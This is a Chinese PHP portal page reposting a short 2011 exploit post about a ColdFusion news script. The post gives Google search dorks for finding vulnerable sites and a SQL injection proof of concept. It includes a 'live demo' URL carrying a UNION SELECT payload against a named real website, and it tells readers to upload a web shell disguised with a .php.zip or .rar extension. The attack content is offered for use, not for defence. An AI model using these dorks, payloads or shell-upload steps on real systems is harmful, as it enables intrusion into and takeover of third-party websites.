文章详情

Php文档 Php问答 行业资讯 Php论坛 Php手册 Php博客
  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
关闭搜索
php爱好者> php文档>Site Developed by Magfiroh SQL Injection and uploa

Site Developed by Magfiroh SQL Injection and uploa

时间:2011-04-29  来源:Platsbanned

发布日期:2011-04.28
发布作者:Platsbanned

漏洞类型:SQL注入
漏洞描述:Site Developed是一款国外程序,存在SQL注入漏洞。在linux系统下存在1.php.zip解析漏洞。

Google:: inurl"berita_detail.cfm?judul="
: inurl:".cfm?judul="

 

#POC

\\~ http://site.com/berita_detail.cfm?judul=[SQL]

\\~ http://site.com/

Live Demo
---------
http://pkkprovkalsel.or.id/berita_detail.cfm?judul=72%20UNION%20SELECT%201,2,version%28%29,user%28%29,5,6--

#permittion allowed upload filetype :zip.pdf.rar.

#upload ur shell rar.php,zip.php into folder Download/document

#ur shell :

http://site.com/dwn/shell.php.zip

demo:

\\~http://pkkprovkalsel.or.id/dwn/met_ultah_rasya.htm

 

标签分类:

相关阅读 更多 +
排行榜 更多 +
幣安BNB币行情神器

幣安BNB币行情神器

金融理财 下载
愤怒的火柴人4中文版下载

愤怒的火柴人4中文版下载

角色扮演 下载
嘟嘟脸恶作剧手游下载

嘟嘟脸恶作剧手游下载

休闲益智 下载

Copyright 2006-2020 (phpxiu.com) All Rights Reserved.

本站为非盈利性网站,不接受任何广告。php爱好者